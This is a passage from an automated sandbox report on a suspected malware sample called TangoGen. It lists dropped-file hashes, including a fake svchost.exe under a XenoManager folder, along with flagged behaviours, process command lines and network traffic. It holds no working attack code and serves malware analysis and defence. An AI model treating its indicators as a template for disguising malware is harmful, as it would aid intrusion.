| SHA256 | c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c |
| SHA512 | 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad |
C:\Users\Admin\AppData\Local\Temp\408MpycnDm\Browser\history.txt
| MD5 | 5638715e9aaa8d3f45999ec395e18e77 |
| SHA1 | 4e3dc4a1123edddf06d92575a033b42a662fe4ad |
| SHA256 | 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6 |
| SHA512 | 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b |
memory/1832-471-0x0000000074A10000-0x0000000074F1B000-memory.dmp
memory/1832-472-0x00000000749A0000-0x00000000749BF000-memory.dmp
memory/1832-505-0x00000000737D0000-0x00000000739FC000-memory.dmp
memory/1832-507-0x0000000073600000-0x000000007360C000-memory.dmp
memory/1832-509-0x0000000074A10000-0x0000000074F1B000-memory.dmp
memory/1832-510-0x00000000749A0000-0x00000000749BF000-memory.dmp
memory/1832-511-0x0000000074990000-0x000000007499D000-memory.dmp
memory/1832-512-0x0000000074970000-0x0000000074988000-memory.dmp
memory/1832-513-0x0000000074940000-0x0000000074967000-memory.dmp
memory/1832-514-0x0000000074920000-0x0000000074936000-memory.dmp
memory/1832-515-0x00000000748E0000-0x00000000748EC000-memory.dmp
memory/1832-517-0x00000000748A0000-0x00000000748AC000-memory.dmp
memory/1832-516-0x00000000748B0000-0x00000000748DF000-memory.dmp
memory/1832-518-0x0000000074870000-0x0000000074897000-memory.dmp
memory/1832-520-0x00000000742E0000-0x0000000074304000-memory.dmp
memory/1832-519-0x00000000747D0000-0x0000000074870000-memory.dmp
memory/1832-521-0x0000000074270000-0x0000000074298000-memory.dmp
memory/1832-522-0x0000000074010000-0x000000007426A000-memory.dmp
memory/1832-523-0x0000000073F70000-0x0000000074004000-memory.dmp
memory/1832-524-0x0000000073F50000-0x0000000073F62000-memory.dmp
memory/1832-525-0x0000000073F40000-0x0000000073F4F000-memory.dmp
memory/1832-526-0x0000000073ED0000-0x0000000073EEB000-memory.dmp
memory/1832-527-0x0000000073D90000-0x0000000073EC7000-memory.dmp
memory/1832-529-0x0000000073CB0000-0x0000000073CC0000-memory.dmp
memory/1832-528-0x0000000073D70000-0x0000000073D86000-memory.dmp
memory/1832-530-0x0000000073C70000-0x0000000073C92000-memory.dmp
memory/1832-531-0x0000000073B50000-0x0000000073C69000-memory.dmp
memory/1832-532-0x0000000073B10000-0x0000000073B41000-memory.dmp
memory/1832-533-0x0000000073AC0000-0x0000000073ACA000-memory.dmp
memory/1832-534-0x0000000073AA0000-0x0000000073AAA000-memory.dmp
memory/1832-536-0x0000000073A80000-0x0000000073A8D000-memory.dmp
memory/1832-537-0x0000000073A40000-0x0000000073A4A000-memory.dmp
memory/1832-535-0x0000000073A90000-0x0000000073A9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI42042\setuptools-65.5.0.dist-info\INSTALLER
| MD5 | 365c9bfeb7d89244f2ce01c1de44cb85 |
| SHA1 | d7a03141d5d6b1e88b6b59ef08b6681df212c599 |
| SHA256 | ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508 |
| SHA512 | d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1 |
C:\Users\Admin\AppData\Local\Tempcsoxvbmjut.db
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Tempcswhrverlv.db
| MD5 | 9c31029ee202128d6d60e9b70e600a8f |
| SHA1 | f2aa6248e74f2d78d49de9b47a43afba8d52b7ec |
| SHA256 | af74414cd78d6d5d2ad88785fbb7a52ec6035bbfe0aa95b4171cd7f2f8000176 |
| SHA512 | a34adb87e985687745570cbe1e8622daf84230a6ce9080a230ab553de29e22456455dfa5270ee054da2ff33e2d0b40196dd366e0ed4daaffb707b08c685ac7df |
C:\Users\Admin\AppData\Local\Tempcspqvpnsxn.db
| MD5 | 87210e9e528a4ddb09c6b671937c79c6 |
| SHA1 | 3c75314714619f5b55e25769e0985d497f0062f2 |
| SHA256 | eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1 |
| SHA512 | f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0 |
C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
| MD5 | 7718d23c6ae306151079b534eee6b7f6 |
| SHA1 | 4806ed5d1136df0e2c499192cea7f122164a0028 |
| SHA256 | 701212841c7d28cddc7cc4f4958d7117607a89556bc581a00084981a0e34f265 |
| SHA512 | d84bab8c02367fcfdcdf4d903f54e637cb7cf2bdb46f4b4d68b53ba38e63e5a97097fececf3645ef45ec33341b872a47342b721bcf558a1f7ec0d34f5f6a3a62 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
91s
Max time network
203s
Command Line
Signatures
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\TangoGen\assets.js
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
91s
Max time network
204s
Command Line
Signatures
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TangoGen\instructions.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\TangoGen\instructions.txt
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.0.1291794468\557970113" -parentBuildID 20230214051806 -prefsHandle 1768 -prefMapHandle 1760 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02445b54-de9e-44bd-85d1-5c701dd21894} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 1848 24c6f7f6f58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.1.73154367\1275902220" -parentBuildID 20230214051806 -prefsHandle 2360 -prefMapHandle 2348 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {445ac2ed-8430-4c26-bff4-201da3388704} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 2372 24c63a8a558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.2.1108614109\1572518470" -childID 1 -isForBrowser -prefsHandle 2936 -prefMapHandle 2932 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {65b503d0-c6eb-4be3-9a91-3ae7906e7664} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 2948 24c73518958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.3.415470815\890156227" -childID 2 -isForBrowser -prefsHandle 3624 -prefMapHandle 3620 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e744dee-7f57-4da1-9f4c-41509a06f32e} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 3632 24c7613ef58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.4.743175878\1606977717" -childID 3 -isForBrowser -prefsHandle 5036 -prefMapHandle 4404 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6735f2ea-1ccc-41cd-85e1-99dbc6931667} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5004 24c77d54658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.5.68514212\1219364063" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5056 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95ec5628-0abf-431f-ad39-253f23f7333c} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5160 24c785a9258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.6.194950423\336006700" -childID 5 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f36c08be-e7de-41f9-9f3f-ba69fdec67c7} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5356 24c785a9e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.7.341744965\306276511" -childID 6 -isForBrowser -prefsHandle 5896 -prefMapHandle 5892 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ae714d1-253c-4dda-9236-daec983542d7} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5904 24c7a17f258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.8.732588754\1133693908" -parentBuildID 20230214051806 -prefsHandle 6164 -prefMapHandle 6160 -prefsLen 27695 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33c89f88-453f-402a-a9f7-91f050cb5e9e} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 6176 24c7ab63e58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.9.1823983917\2029031284" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 6192 -prefMapHandle 6184 -prefsLen 27695 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f449ece3-a11f-4127-90a0-42f934a101f4} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 6320 24c7abd7858 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.10.1210588212\1395681880" -childID 7 -isForBrowser -prefsHandle 6608 -prefMapHandle 6604 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a7b420f-bc02-499e-8cdb-1a680af05f52} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 6616 24c7ad23e58 tab
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49727 | | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 35.83.153.5:443 | shavar.prod.mozaws.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| N/A | 127.0.0.1:49735 | | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| GB | 216.58.212.206:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.212.206:443 | youtube-ui.l.google.com | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.6:443 | static.doubleclick.net | tcp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.200.6:443 | static.doubleclick.net | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 76cdf555bd6571bce660d722c87889e7 |
| SHA1 | dace01c91deac69de2c37282fd0ead8eb0562932 |
| SHA256 | a6365e231c733480137711149158f8ddebaade47e2e7b5a600e7124c6e6fb655 |
| SHA512 | 5c54898143c5cdc6431990acf783bfd90453f80b71064376124d309d099878dd9aed1776b76857f0dbdea979a12ce940579f98a795bd56ef86b47fe8de8fcdc5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js
| MD5 | 0fe9ac5e645cfea2b430a730da3b6276 |
| SHA1 | 07adcd09b97b5b9cc7f24cd4430090387c0dfd5e |
| SHA256 | 05add04c82b46e8ae86ad7afc31956451c9b9e483621288a3b081be4a7ea6a4c |
| SHA512 | 1d1ee6fa1d8720775f1f9d0014a020e3dab707c7939f0be8b86b775fe45c14b2c418ace877d5fecadd0ceccee359928967f3d232df23bee523ebfdc29c631dcb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 723e63d49e6d6b1f94748292ec2c6ffe |
| SHA1 | 4f9dc7a1e71521b77a4ac8c30b0a5b4a6852b06c |
| SHA256 | e94f17d3cea1ca52da9a95e964ab411e67bb81441d27dbeff6eab46657c384cd |
| SHA512 | 5b5713696cf091f397c683a962789a63a2bfe0e5b1d60a47ac0fdae18fe123fd685f2b3323052dc1ec3d35f6f15acbf6146d0f963d1096b1abe720caafdf2c9e |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\27740
| MD5 | 4a929b146028932a2695680d389f73d8 |
| SHA1 | ca7554b1f9d8055abe575ecc8857c81b0aecea3f |
| SHA256 | 445bae41804f4cb1706528d2da29631cfecd4bb934370eb09540e98fb5872836 |
| SHA512 | 56900620ca6f182583b5cad8907d2ba9b8c4dab623537de7ae5ae822856cdd95c8be2803a81bf6070fa3144a4c79dc9861e29eb5645e7b28f3c65a4e6e2cf851 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\26868
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\21300
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\1463
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\sessionstore.jsonlz4
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
149s
Max time network
273s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2448 wrote to memory of 4460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE |
| PID 2448 wrote to memory of 4460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TangoGen\license.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\TangoGen\license.txt
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
Network
Files
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
212s
Max time network
302s
Command Line
Signatures
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TangoGen.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\TangoGen.rar"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\TangoGen.rar
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.0.1912472413\899983855" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1788 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3db466d9-8a9d-45ef-b0ed-b4c44445c2b2} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 1896 1a29f013b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.1.1205956817\139048220" -parentBuildID 20230214051806 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73ddbaa5-f518-49f8-baf5-4a9e87166a56} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 2440 1a28ae85458 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.2.130677202\1121656305" -childID 1 -isForBrowser -prefsHandle 2956 -prefMapHandle 2952 -prefsLen 22963 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e5a64e8-db69-411c-ad5b-16a46a494907} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 2968 1a2a204e258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.3.933664428\808760156" -childID 2 -isForBrowser -prefsHandle 3476 -prefMapHandle 3472 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c0687a4-b663-4113-96f9-e03b31fa80c2} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 3480 1a2a4940158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
